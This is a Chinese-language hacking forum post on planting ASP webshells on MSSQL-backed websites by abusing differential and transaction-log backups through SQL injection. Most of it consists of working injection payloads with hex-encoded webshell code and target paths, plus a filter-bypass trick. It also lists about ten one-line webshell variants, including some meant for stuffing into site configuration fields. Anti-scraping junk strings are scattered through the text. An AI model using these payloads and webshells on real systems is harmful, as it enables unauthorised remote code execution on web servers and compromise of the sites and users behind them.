MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
' w. B8 X9 j% S3 [+ G" z  K7 N
" r0 u0 Z& Z% K9 C2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
" Q* ]' m# x* |# B" J
9 o, W; d5 q7 X8 o$ c$ H, k+ ^上面
" ]7 Y5 @4 f, j4 ^0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
+ A' b4 v+ A  |$ V
* h& A4 k8 W% O5 N' u. P& C如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
8 S" y4 c$ K& H1 E步骤:
! b' p8 T' P4 Z4 O+ m
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

) a8 K5 p6 z( g5 J) Screate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
: |' }6 g8 s  @" X) X
3 P  p/ R% B$ H; y0 G, z
0 F' Q- }6 n) Y" dinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
4 h, P  C$ g" I' N( H7 }6 C; G* G+ ?% H
# }9 [! q* ~6 w) Sdrop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
8 X" w& M) J8 j
$ X- y# u# p" s5 G2 J: h% A声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================
: J1 g9 k3 w, u
我发现上面代码，有时会无效，而直接用
/ O+ l* C. E4 Y
backup database 库名 to disk = 'c:\ddd.bak'
# l9 u$ L: h3 J& `
create table [dbo].[dtest] ([cmd] [image]);
' g1 V# Z# i7 O1 b" w
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

+ M' b, W6 j1 I: g- _% ^. s& `backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！
) ]* \$ j" a" K& }' v' O) `3 T
库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

) @1 Z5 E( N3 {, Y0 `网上还有log增量备份的，我也把他记录一下
" L, R& G2 ^6 f; C: N# J7 v=====================================================
, ~* J$ Q$ S/ d6 U- m" A另一种log增量备份技术:
2 N3 e, q& c8 b, D8 \
';alter database null set RECOVERY FULL--

: ~! A  E4 u5 Y. \';create table cmd (a image)--

7 j9 I. G: I: ^* I0 D';backup log null to disk = 'f:\cmd' with init--

% m7 E  Y% l6 Z) m0 `';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
5 Z( c5 _' q5 v7 n0 y
3 d' I' a0 C, P+ c+ ^';backup log null to disk = '备份路径'--
  S3 `. L; m, H7 Z3 O( i
1 ^4 b6 F4 [" K, W4 L6 P4 Y';drop table cmd--

5 L4 g4 h; i$ {* t3 o';alter database XXX set RECOVERY SIMPLE--

PS:0x3C2565786563757465287265717565737428226122292
; h$ Q' A- R: ~" @9 h$ G: q+ A3 i- Z$ p9253EDA 是一句话小马16进制转来的
: g) f8 k: F; x! E- s1 }
: n" c$ a8 k5 K5 D# c4 A6 _+ |说到一句话马，还可以有这么几种写法：
2 |' |1 b$ `* v" B! ~
3 U9 b* Y: A4 b) O. \a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
0 O& h* t: W2 X  G: uf)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
1 H; B2 w7 m1 yg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
7 T0 X+ r8 L% t6 y0 XI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
& k4 G7 c. p& ]
$ w. V, h6 g, B7 v1 Z1 D=============================================

( k: p" t3 Y( L6 C8 _# l9 U当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
5 z- d' \* V& H  s2 c: ?) i
把要执行的语句转16进制然后用exec执行
1 ]8 }, @. a& B' b  R& M% K

减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
% \4 l/ C2 S  t$ d5 [7 lid=1;backup database model to disk='你的路径‘ with differential,format;--

2 u9 a0 u/ E  ]6 [' n
4 b$ O' s4 r8 k: V* E( B
3 e+ |. w4 E( M% s- D1 n' ySQL语句清理日志
. o' [" d% W* j9 x) M( }/ L6 `9 q5 Z6 U注：test为数据库名

--清空日志
DUMP TRANSACTION test WITH NO_LOG

--截断事务日志
BACKUP LOG test WITH NO_LOG

) O+ a4 S" l* |: U! z--收缩数据库
3 V1 [% _$ G' ^% lDBCC SHRINKDATABASE(test)

9 H) j5 r0 D' v  a& R3 E--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
7 ?' B8 Q! E% M. ]& v- t
# C( n8 F6 V; W% B--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'